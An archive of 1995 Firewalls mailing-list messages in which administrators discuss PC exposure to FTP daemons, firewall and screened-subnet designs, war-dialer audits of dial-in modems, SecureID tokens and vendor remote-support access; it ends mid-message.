SMTP id UAA18136 for ; Wed, 3 May 1995 20:25:43 -0700 Received: by cseic.saic.com (4.1/1.34) id AA03055; Wed, 3 May 95 23:13:50 EDT Date: Wed, 3 May 95 23:13:50 EDT From: steveg@cseic.saic.com (Stephen Harold Goldstein) Message-Id: <9505040313.AA03055@cseic.saic.com> To: cjolley@iac.net Cc: rgm3@is.chrysler.com, bdboyle@maverick.erenj.com, firewalls@GreatCircle.COM In-Reply-To: Carl Jolley's message of Tue, 2 May 1995 10:17:08 -0400 (EDT) Subject: Re:TRUST US Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Re: > At 09:31 AM 4/28/95 -0400, Carl Jolley wrote: > > > >I once asked the Technical Support Manager of a data center what his > >disaster recovery plan for his data center was and he told me that his > >disaster recover plan was: if a disaster occurred, he would turn in his > >resignation. His logic was that the risk of getting hit by a disaster > >was low but the probability of him having to do a lot of work to develop > >the plan was high, so.... > Anyone who gets that kind of answer should respond with the following: "Let's save you some time. I'll expect your letter of resignation on my desk by the close of business." From firewalls-owner Wed May 3 20:44:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16094 for firewalls-outgoing; Wed, 3 May 1995 19:21:11 -0700 Received: from gold.interlog.com (gold.interlog.com [198.53.145.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA16089 for ; Wed, 3 May 1995 19:21:05 -0700 Received: from (gilo.net5d.io.org [199.166.193.4]) by gold.interlog.com (8.6.10/8.6.10) with SMTP id WAA26129 for < firewalls@GreatCircle.com>; Wed, 3 May 1995 22:21:16 -0400 Message-Id: <199505040221.WAA26129@gold.interlog.com> Date: Wed, 03 May 95 22:20:43 EDT From: gtennan@interlog.com (Gil Tennant) Reply-To: gtennan@interlog.com (Gil Tennant) To: firewalls@GreatCircle.com X-Mailer: PMMail (v1.05 UNREGISTERED SHAREWARE) Subject: Re: PC site security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 03 May 1995 07:20:23 -0500 you wrote: >> Christopher J. Calabrese >> Network Security Architect >> Novell Information Services & Technology, Summit,NJ >> cjc@summit.novell.com >> >> PC clients that are visible to the world don't currently >> constitute a security problem > >I believe this should be understood with the caveat that *no* >packages with daemons for telnet, ftp, ... are installed on >the PC nor is the PC running server software such as >X-windows. > >> - - Don't rely on your security policy to keep users >> from installing software that will compromise your site. >> They may install software they don't even _know_ is >> a security risk. > >IMHO the vast majority of NetWare LAN Administrators >(perhaps not CNEs) are also unaware of how easy it is to >install software packages that will compromise a site with >daemons. In a similar style of question (excuse me as I missed the thread).. If my employer has a PC SLIPped into the Internet (running a telnet client or ftp client, or IRC for that matter, would they be open for intrusion from a would-be unscrupulous party? Must they be running a daemon? And if they were logged into the Netware LAN, wouldn't this lead to a further scurity risk, if daemons are not required to be running, to cause a security problem? What minimum "Internet software" utilities would allow for a security risk in a SLIP situation, on a DOS/Windows PC (with and without LAN connection as well)? Gil *#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#* * * * Gil Tennant - gtennan@io.org, @ibm.net, @interlog.com, CIS:74511,3651 * * Systems Technical Specialist - Web Page.. http://www.io.org/~gtennan * * Novell Network Installer/Administrator (working on my CNE), Technical * * software support in Microsoft, Lotus, modem communications software and * * many other software applications, OS/2 Support at Internex Online... * * * *#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#* From firewalls-owner Wed May 3 20:50:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16212 for firewalls-outgoing; Wed, 3 May 1995 19:26:16 -0700 Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA16207 for ; Wed, 3 May 1995 19:26:12 -0700 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA18178; Wed, 3 May 95 22:26:20 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9505040326.AA18178@hawksbill.sprintmrn.com> Subject: Re: Access control across a large network - firewall or other system? To: sikpuppy@maestro.com (Sick Puppy) Date: Wed, 3 May 1995 22:26:19 -0500 (EST) Cc: firewalls@GreatCircle.com In-Reply-To: from "Sick Puppy" at May 3, 95 09:23:47 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 2906 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What you have just described is a _very_ familiar scenario in my life on a day-to-day basis, as well as images that wake me up at night with the heebie jeebies. This is a continually surfacing issue with networks that we have built, designed, redesigned and/or manage(d). If a centralized access control mechanism is needed in a scenario such as this, centralized network management is the key. You simply toss effectiveness to the four winds when you allow autonomous management of the same IP address space. The onus is on corporate network management to dictate policy. Otherwise, its every man for himself, to coin a phrase. Certainly access-control, and route propogation, can be controlled rather effectively from a fringe-point on a large corporate network, in the right hands. - paul (sorry for the entire quote -- its relevant.) > > The following describes a real life situation. > > There is a large (class B) network that has users performing much > different functions on different subnets. They have about 200 subnets > (class C networks) connected together through several Cisco 7000 > routers. > For pretty good reasons the users of different subnets don't trust each > other. In particular, some of the programmers of financial systems have > tried to crack accounts of other people on database systems that the financial > programmers are not supposed to use. Users on some subnets are paranoid that > the work they are doing might be leaked to the press while users on other > subnets really like the attention they get from the press. As the network has > grown, some users have installed their own insecure dial-up links to > other networks instead of using the secure corporate links. > > For all I know, this could describe many large corporations. However, > there is a clear need to protect the different subnets from each other > and to limit what other systems in the class B network the users on > any particular subnet can connect to. In short, they need a centralized > access control mechanism that blocks unwanted connections. > > I know that the Night Hawk from Harris Corp. can be used to provide this > kind of centralized access control and in fact it is the only box I > have come across that can do this kind of thing. I would like to know what > other alternatives exist. > > Could this kind of access control be provided by centralized firewalls or is > some dedicated access control system needed? > > Sick Puppy > > > > _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Wed May 3 21:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA20059 for firewalls-outgoing; Wed, 3 May 1995 20:59:22 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA20054 for ; Wed, 3 May 1995 20:59:19 -0700 Received: by little-miami.iac.net id XAA24301; Wed, 3 May 1995 23:59:41 -0400 Date: Wed, 3 May 1995 23:59:40 -0400 (EDT) From: Carl Jolley To: Stephen Harold Goldstein cc: rgm3@is.chrysler.com, bdboyle@maverick.erenj.com, firewalls@GreatCircle.COM Subject: Re:TRUST US In-Reply-To: <9505040313.AA03055@cseic.saic.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This sort of snappy retort would have been quite out of place since he didn't work for me and in fact, he and I didn't work for the same company. **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** On Wed, 3 May 1995, Stephen Harold Goldstein wrote: > Re: > > At 09:31 AM 4/28/95 -0400, Carl Jolley wrote: > > > > > >I once asked the Technical Support Manager of a data center what his > > >disaster recovery plan for his data center was and he told me that his > > >disaster recover plan was: if a disaster occurred, he would turn in his > > >resignation. His logic was that the risk of getting hit by a disaster > > >was low but the probability of him having to do a lot of work to develop > > >the plan was high, so.... > > > > Anyone who gets that kind of answer should respond with the following: > > "Let's save you some time. I'll expect your letter of resignation on my > desk by the close of business." > From firewalls-owner Thu May 4 05:39:38 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA28613 for firewalls-outgoing; Thu, 4 May 1995 05:30:39 -0700 Received: from Sun.COM (Sun.COM [192.9.9.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA28607 for ; Thu, 4 May 1995 05:30:36 -0700 Received: from East.Sun.COM (east.East.Sun.COM) by Sun.COM (sun-barr.Sun.COM) id AA11059; Thu, 4 May 95 05:31:03 PDT Received: from suneast.East.Sun.COM by East.Sun.COM (4.1/SMI-4.1) id AA08486; Thu, 4 May 95 08:31:00 EDT Received: from caseydog.East.Sun.COM by suneast.East.Sun.COM (5.0/SMI-4.1-900117) id AA03013; Thu, 4 May 1995 08:30:52 +0500 Received: by caseydog.East.Sun.COM (5.x/SMI-SVR4) id AA05909; Thu, 4 May 1995 08:32:46 -0400 Date: Thu, 4 May 1995 08:32:46 -0400 From: alans@caseydog.East.Sun.COM (Alan Sonnenberg - SunNetworks) Message-Id: <9505041232.AA05909@caseydog.East.Sun.COM> To: janb@olymp.fer.uni-lj.si Subject: Re: Screened subnet with one router? Cc: Firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Content-Length: 2791 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hello-- If I had to vote between the choices in your message, I would take number 1 and if in makes sense to the customer, I would use two seperate vendors for my packet filtering devices. My hope would be that a problem used to circumvent R1 could not be used on R2. The thing I don't like about design two is that it produces a single point of failure in my security policy, i.e., break my packet filter and you are home free. A common design I use is a slight modification to design one: | | external DMZ, web, anon ftp, etc. | -- | -- Internet -->|R1|-----+-------|R2|----- inside net -- -- | Bastion host |DMZ | In the above design configure the ISP's router (R1) in such a way that all Internet TCP circuits terminate on the "bastion" (or external DMZ machines). If you have "playful" internal users put in a third router between R2 and the inside net. Configure that router so that all internal TCP circuits terminate on the bastion. This will prevent internal users from "playing" with R2. Congigure R2 with the appropriate filters. Don't forget to secure your bastion host, patches, removal of unneeded services, etc., etc.......... hope this helps, alan sonnenberg :--> :--> > Is there any difference in the security of a screened subnet firewall :--> > using two routers (one serial-ethernet, the second ethernet-ethernet) :--> > opposed to using one router with serial-ethernet-ethernet interfaces? :--> > :--> > --------------------------------------------------------------------- :--> > :--> > First design: :--> > :--> > -- DMZ -- :--> > Internet -->|R1|-------------|R2|----- inside net :--> > -- bastion -- :--> > host :--> > :--> > --------------------------------------------------------------------- :--> > :--> > The second one: :--> > :--> > -- :--> > Internet -->|R1|------- inside net :--> > -- :--> > b. | :--> > host |DMZ :--> > | :--> > - :--> :--> One advantage of the first design is that you may need/want to have different :--> routing policies, in addition to different packet filtering, in R1 than R2. :--> A disadvantage is that, if the bastion is subverted, it is in the best place :--> to sniff all your Internet traffic. This is not true of the second design. :--> :--> With the second design you will have more than one internal interface, :--> so preventing source address spoofing will require the screen on incoming :--> packets, which Cisco (e.g.) software, only supports in more recent versions. :--> :--> -- John :--> :--> From firewalls-owner Thu May 4 06:09:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA28852 for firewalls-outgoing; Thu, 4 May 1995 05:53:10 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA28847 for ; Thu, 4 May 1995 05:53:07 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA14477; Thu, 4 May 1995 08:53:31 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA15788; Thu, 4 May 1995 08:53:29 -0400 Message-Id: <9505041253.AA15788@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Thu, 4 May 1995 08:53:25 -0500 Subject: looking for war diallers Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Looking for pointers to war diallers for the purpose of enforcing a "no dialin modem" policy. -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## Life is like a boxing chocolate ## From firewalls-owner Thu May 4 06:46:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29017 for firewalls-outgoing; Thu, 4 May 1995 06:07:03 -0700 Received: from usasmtp.usagroup.org ([198.70.128.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA29012 for ; Thu, 4 May 1995 06:07:00 -0700 Received: from DOMAIN-E-Message_Server by usasmtp.usagroup.org with Novell_GroupWise; Thu, 04 May 1995 08:11:11 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 04 May 1995 08:07:48 -0600 From: David Leonard To: firewalls@greatcircle.com Subject: Researching Firewall Products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am in the process of researching what type of firewall products are out on the market. I have looked at Sidewinder, Guantlet and Firewall-1. I am starting to get interested in the functionality and flexibility of Firewall-1. My question is, are there similiar products to Firewall-1 on the market and if there, what are their names and how can I get in touch with them. Any assistance I can get will be appreciated. david From firewalls-owner Thu May 4 06:54:23 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29169 for firewalls-outgoing; Thu, 4 May 1995 06:13:02 -0700 Received: from gategn.telecom.ptt.nl (gategn.telecom.ptt.nl [193.79.184.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA29161 for ; Thu, 4 May 1995 06:12:44 -0700 Received: by gategn.telecom.ptt.nl (4.1/SMI-4.1) id AA05937; Thu, 4 May 95 10:38:03 +0100 Message-Id: <9505040903.AA17599@hdxu03.telecom.ptt.nl> X-Sender: mosse001@mailgate X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 04 May 1995 10:11:01 +0200 To: firewalls@greatcircle.com From: P.vanMossel@telecom.ptt.nl Subject: RE: completely transparent filtering device? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Drawbridge could be usefull. See Paul. From firewalls-owner Thu May 4 07:09:44 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA00114 for firewalls-outgoing; Thu, 4 May 1995 06:54:50 -0700 Received: from virtual.office.com (welcome.vo.com [204.192.49.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA00109 for ; Thu, 4 May 1995 06:54:46 -0700 Received: (from alex@localhost) by virtual.office.com (8.6.12/8.6.12) id JAA22860; Thu, 4 May 1995 09:55:31 -0400 Date: Thu, 4 May 1995 09:55:31 -29900 From: "S. Alexander Jacobson" Subject: Re: PC site security To: Gil Tennant cc: firewalls@GreatCircle.COM In-Reply-To: <199505040221.WAA26129@gold.interlog.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk NetManage Chameleon packages an FTPd with their Internet client software. I haven't tried doing this with chameleon but...If you're employer is running the FTP'd and has private netware drives mounted, then anyone who hacks through the ftpd gets access to those private directories. -Alex- _____________________________________________________________________________ S. Alexander Jacobson Internet Virtual Office Inc. alex@virtual.office.com Consulting info@virtual.office.com http://vo.com/people/alex/ ** http://virtual.office.com 1-212-799-2645 voice Technology gopher.virtual.office.com 1-212-799-1075 fax Strategy telephone: 1-800-TODAY-VO From firewalls-owner Thu May 4 07:33:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29361 for firewalls-outgoing; Thu, 4 May 1995 06:21:45 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA29356 for ; Thu, 4 May 1995 06:21:42 -0700 Received: from relay.tis.com by relay1.UU.NET with SMTP id QQyogr06001; Thu, 4 May 1995 09:22:09 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma003373; Thu, 4 May 95 09:20:20 -0400 Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA27340; Thu, 4 May 95 09:21:00 EDT Received: by (4.1/illuminati) id AA02705; Thu, 4 May 95 09:28:07 EDT From: "Marcus J. Ranum" Message-Id: <2705.9505041328@illuminati> Subject: Re: Pentagon security professionals To: fc@all.net (Dr. Frederick B. Cohen) Date: Thu, 4 May 1995 09:28:07 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9505040242.AA04054@all.net> from "Dr. Frederick B. Cohen" at May 3, 95 10:42:01 pm Organization: Trusted Information Systems, Inc. Glenwood, MD Phone: 301-854-6889 Coredump: Infocalypse Now!!! Content-Type: text Content-Length: 508 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dr. Frederick B. Cohen writes: > Please feel free to flame away. No, please don't flame away. The list has enough problems with poor signal to noise ratio without someone *encouraging* flaming. I've noticed a tendency for some discussions on the list to continue interminably, in which one or both parties refuse to forgo getting in the last word. In those cases I am trying (and encourage others to do likewise) to cease engaging in a discussion after a reasonable number of mails back and forth. mjr. From firewalls-owner Thu May 4 09:28:17 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02928 for firewalls-outgoing; Thu, 4 May 1995 08:34:48 -0700 Received: from vtserf.cc.vt.edu (vtserf.CC.VT.EDU [128.173.4.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA02921 for ; Thu, 4 May 1995 08:34:42 -0700 From: marchany@vtserf.cc.vt.edu Received: by vtserf.cc.vt.edu (5.65/DEC-Ultrix/4.3) id AA02675; Thu, 4 May 1995 11:35:03 -0400 Message-Id: <9505041535.AA02675@vtserf.cc.vt.edu> To: mark@seismo.CSS.GOV (Mark LeVea), firewalls@greatcircle.com Cc: marchany@vtserf.cc.vt.edu, laxnn@trane.laxbldg17.lax.trane.com Subject: Re: repository of Security policies - CORRECTION In-Reply-To: Your message of "Thu, 04 May 95 06:47:50 EDT." <9505041047.AA17540@mimer.CSS.GOV> Date: Thu, 04 May 95 11:34:57 -0400 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In an earlier note that I posted to the firewalls list, I gave the incorrect address of the security policy repository that is at eff.org. The correct hostname is: ftp.eff.org A good list of acceptable use policies (mostly academic but some commercial) can be found in the /pub/CAF/policies at this site. Sorry for the error, it was a case of my hands outrunning my brain :-). -Randy Marchany VA Tech Computing Center Blacksburg, VA 24060 From firewalls-owner Thu May 4 09:34:28 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02878 for firewalls-outgoing; Thu, 4 May 1995 08:31:10 -0700 Received: from lykos.netpart.com (lykos.netpart.com [199.35.49.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02873 for ; Thu, 4 May 1995 08:31:06 -0700 Received: (phil@localhost) by lykos.netpart.com (8.6.9/8.6.5) id IAA29745; Thu, 4 May 1995 08:30:20 -0700 Date: Thu, 4 May 1995 08:30:20 -0700 From: Phil Trubey Message-Id: <199505041530.IAA29745@lykos.netpart.com> To: padgett@tccslr.dnet.mmc.COM Subject: Re: Source Code In-Reply-To: <9505011859.AA04955@uvs1.orl.mmc.com> Organization: NetPartners, Newport Beach, CA Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9505011859.AA04955@uvs1.orl.mmc.com> you write: >Frank rites: >>Even though we include source code with our distribution, I would not suggest >>that anyone make changes. It gets real hard to try to support a product >>and changes as well. I can not guarantee that any changes that are >>made will work in the next version. > >This is the best choice IMNSHO. The code is there if necessary (and often is, >cannot count the times I have had to make a vendor-suggested patch because the >vendor could not duplicate the problem on their equipment), and available >for examination (when I have made trouble calls, this has often enabled me >to direct the vendor's attention to the specific module giving trouble. There are other ways of providing the same functionality - BorderWare has a user-controllable (ie. you can turn on and off this feature via the console, by default it is off) back door that allows the developers to effectively telnet into the firewall (which can be initiated only via a certain IP address, and only using strong authentication) over the net and see what's wrong with a firewall. Patches can be downloaded from the net (patches are cryptographically checksummed, of course) by end users and a console menu selection is used to apply them (the patch update code brings the machine down to a single user, non-network listening mode, applies the patches and reboots). If you need to debug a commercial program on your own, the vendor obviously has a problem with supporting their installed base. I realize that trusting a vendor to have good support policies is always an act of faith, but BorderWare (and other firewall vendors, I might add) have an open user mailing list that users can gripe about bad support to. This provides a tight feedback loop since a lot of prospective customers look at this list... >The point is that in a dynamic environment a customer may not be able to wait >for the next version and at the same time, the vendor may not have the >available resources (equipment and manpower) to be able to recreate it. And with the above described setup, the software manufacturer can debug your particular dynamic set up ("Did you know you had a mail routing loop?") and create patches that are installable and downloaded by everyone which keeps everyone running the same versions. -- Phil Trubey | NetPartners | Providing Internet products and services. E-mail: phil@netpart.com | Home Page: http://www.netpart.com/ Phone: 714-759-1641 | From firewalls-owner Thu May 4 09:39:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03443 for firewalls-outgoing; Thu, 4 May 1995 09:04:18 -0700 Received: from gmlink2.gmeds.com (gmlink2.gmeds.com [192.85.154.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03434 for ; Thu, 4 May 1995 09:04:01 -0700 Received: from wtc.nec.gmeds.com (necns.wtc.nec.gmeds.com) by gmlink2.gmeds.com with SMTP id AA18192 (InterLock SMTP Gateway 3.0 for ); Thu, 4 May 1995 10:13:08 -0400 Received: from glock.wtc.nmc.gmeds.com by wtc.nec.gmeds.com (4.1/EDS-1.0) id AA17528; Thu, 4 May 95 10:12:46 EDT Received: by glock.wtc.nmc.gmeds.com (5.x/SMI-SVR4) id AA19246; Thu, 4 May 1995 10:09:12 -0400 From: atkinsr@glock.wtc.nec.gmeds.com (Rusty Atkins L.) Message-Id: <9505041409.AA19246@glock.wtc.nmc.gmeds.com> Subject: looking for war diallers (fwd) To: firewalls@greatcircle.com (firewalls) Date: Thu, 4 May 1995 10:09:11 -0400 (EDT) Reply-To: atkinsr@glock.wtc.nmc.gmeds.com X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forwarded message: > > Looking for pointers to war diallers for the purpose of enforcing a > "no dialin modem" policy. > -- Get the "Hacker Chronicles" CD(s), there are dozen of them there. -- ---------------------------------------------------------------------------- * Rusty Atkins This EDS/ATSS * * email: atkinsr@glock.wtc.nmc.gmeds.com space Mfg B, MD-44 * * Phone: (810) 947-0220 intentionally 30300 Mound * * Pager: (810) 316-3392 left Warren, MI. * * Fax: (810) 947-0652 blank 48090 * ---------------------------------------------------------------------------- From firewalls-owner Thu May 4 10:14:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03188 for firewalls-outgoing; Thu, 4 May 1995 08:48:00 -0700 Received: from Polka.Med.Yale.Edu (polka.med.yale.edu [130.132.19.123]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03183 for ; Thu, 4 May 1995 08:47:56 -0700 Received: from beaker.med.yale.edu by Polka.Med.Yale.Edu (PMDF #12135) id <01HQ3RCY748W0000X4@Polka.Med.Yale.Edu>; Thu, 4 May 1995 11:49 EDT Received: from rrr.ynhhlab.yale.edu by beaker.med.yale.edu via SMTP; Thu, 4 May 95 11:45:33 -0400 Date: Thu, 04 May 1995 11:45:21 -0400 From: rodion@beaker.med.yale.edu (R. Rodion Rathbone) Subject: Re: Secure Modem Pool To: firewalls@greatcircle.com Message-id: <9505041545.AA13486@beaker.med.yale.edu> X-Envelope-to: firewalls@greatcircle.com Content-type: text/plain; charset="us-ascii" X-Sender: rodion@beaker.med.yale.edu Mime-Version: 1.0 X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve Waltner wrote: ----stuff cut out---- > What about a product from Security Dynamics and is called SecureID? >This setup sounds like a fairly secure setup to me, but I wanted other >opinions from readers of this mailing list. Joe Pennel responds: >I had a chance to use the SecureID card at a former employer, and was very >impressed. In addition to the features mentioned, I must add that admin >of these things is great, especially if you have remote users. [...] Greg Woods adds: >That's fascinating, because I thought admin of these things was a royal pain >in the butt. For one thing, the ONLY way to set the PIN number requires [...] There was more discussion of SecureID here several months back, and opinion was mixed, some really liking it and others finding it a pain. I think the differences were more than personal just taste (in admin menus, etc.). I think they depended on technical sophistication, tolerance, and seriousness of those using the card, and how tight a security barrier the administrator felt he/she needed. Those who really wanted a token based system, and had reasonably good users were happy with it. Another thought Skey was fine, and in some ways preferable. If dial-back or caller-ID is an acceptable solution to you, then you will probably find the overhead of the token system a pain. (Dial-back has a vulnerability unless you use a separate line to call back, one that outsiders don't know the number for, or that blocks incoming calls at the central office.) I have been one of the less happy users of SecureID, since many of the users are loosely connected to the institution, and variably motivated for security of the data involved. I have gotten cards back with the phone number and PIN number written on a label on the card. They didn't even think to take it off before they gave it to me. My computer section staff would never do this, but a physician outside the institution thinks "its only for laboratory data, what's the big deal". (Yes, I do give them the security speech when they get the card, and they sign something which is heavily worded, but fundamentally they are not directly part of the institution.) For these users, in this situation, dial-back would be safer, as they could use a password they could remember. The base unit resynchronizes with each card each time that card is used, thats one reason the PINs have to be unique, to identify the card. If a card is unused for 3 months, it can get far enough out of sync that it can't recover. The drift varies from card to card, of course, and may depend on the condition of the battery. Once a week use will never be a problem. Once a month is probably ok, except for the occasional card that is marginal. The cards need physical protection. A shirt pocket is OK, but don't let the credit card size lead you to think it can go in a wallet. It won't survive. The $60 a card, every 3 years, can become significant, but the overhead of buying and issuing new cards may be just as much of a concern. -Rodion Rathbone (I speak for myself, as best I can.) From firewalls-owner Thu May 4 10:15:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03918 for firewalls-outgoing; Thu, 4 May 1995 09:48:35 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA03913 for ; Thu, 4 May 1995 09:48:28 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA07708 for ; Thu, 4 May 1995 11:50:16 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 199590000; 4 May 95 12:48 CDT Received: from sctc.com by sccmailhost.sctc.com id 177210000; 4 May 95 12:47 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id LAA01972; Thu, 4 May 1995 11:47:55 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA07300; Thu, 4 May 1995 11:47:54 -0500 Date: Thu, 4 May 1995 11:47:54 -0500 From: Rick Smith Message-Id: <199505041647.LAA07300@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Access control across a large network - firewall or other system? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sick Puppy writes about a large organization: >For pretty good reasons the users of different subnets don't trust each >other. In particular, some of the programmers of financial systems have >tried to crack accounts of other people on database systems that the financial >programmers are not supposed to use. Users on some subnets are paranoid that >the work they are doing might be leaked to the press while users on other >subnets really like the attention they get from the press. As the network >has >grown, some users have installed their own insecure dial-up links to >other networks instead of using the secure corporate links. >... In short, they need a centralized >access control mechanism that blocks unwanted connections. What you're describing is a common situation in which separate entities within a larger organization have very different security requirements. One approach is for the separate groups to take responsibility for their own security. This is difficult in some corporate cultures, however. >I know that the Night Hawk from Harris Corp. can be used to provide this >kind of centralized access control and in fact it is the only box I >have come across that can do this kind of thing. I would like to know >what other alternatives exist. We've built Sidewinder 2.0 to allow multiple networks with differing access controls allowed between them. So you can allow certain proxy flows between the inside networks and other flows between inside and Internet. So far, however, the organizations with Sidewinders haven't needed multiple network connections in practice. There's lots of politics in setting up separate access rules inside an organization. Another alternative is to install separate firewalls on the individual entity networks. The individual net admins can control access to their internal nets, and not allow the net admins to tweak the access controls for other groups' nets. Or else remotely manage the firewalls from a central site. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Thu May 4 11:18:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04615 for firewalls-outgoing; Thu, 4 May 1995 10:23:46 -0700 Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04602 for ; Thu, 4 May 1995 10:23:39 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id NAA11130 for ; Thu, 4 May 1995 13:32:45 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma011128; Thu May 4 13:32:35 1995 Received: from metis.milkyway.com (root@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id NAA02548 for ; Thu, 4 May 1995 13:28:06 -0400 Received: from metis.milkyway.com by metis.milkyway.com (8.6.9/BSDI-Client) id NAA00603; Thu, 4 May 1995 13:33:57 -0400 Message-Id: <199505041733.NAA00603@metis.milkyway.com> x-mailer: exmh version 1.6delta 4/7/95 x-uri: http://www.milkyway.com/People/Michael_Richardson/Bio.html to: firewalls@greatcircle.com subject: Re: Firewall failure modes (was Re: performance) references: <9504251648.AA07530@brittany.oes.amdahl.com> <3631.9504260648@illuminati> mime-version: 1.0 content-type: application/pgp; format=mime; x-action=signclear; x-originator=21723369 content-transfer-encoding: 7bit Date: Thu, 04 May 1995 13:33:56 -0400 From: Michael Richardson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- content-type: text/plain; charset=us-ascii In article 